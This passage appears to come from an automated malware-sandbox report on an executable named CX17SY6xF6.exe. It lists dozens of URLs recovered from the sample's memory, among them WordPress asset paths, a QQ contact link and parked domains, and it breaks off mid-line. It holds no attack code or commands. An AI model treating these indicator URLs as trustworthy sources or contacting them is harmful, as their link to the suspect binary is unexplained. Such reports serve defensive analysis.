                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1687814006
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5e1906bec96d1e3fc9ce
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5e1906bec96d1e3fc9ce5c4f
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5e1906bec96d1e3fc9ce5c4f1
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=5e1906bec96d1e3fc9ce5c4f198cbceb
                  Source: CX17SY6xF6.exe, 00000000.00000003.766371210.00000000071BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sjbmw.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                  Source: CX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.888204578.0000000007222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                  Source: CX17SY6xF6.exe, 00000000.00000003.681114888.0000000007217000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.railbook.net/
                  Source: CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.railbook.net/T
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/
                  Source: CX17SY6xF6.exe, 00000000.00000003.768564697.0000000000E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/9X
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577691996.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.alteor.cl/.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.asdoptics.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/J
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?gif
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?today
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/cgi-bin/daycount/daycount.cgi?yes
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/gallery.htm
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.baijaku.com/images/cd/cdshop/cd_bright%20fortune.html
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.basmedcol.com
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.bucea.edu.cn/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.c9dd.com/C#i((
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ccri.com.cn/
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 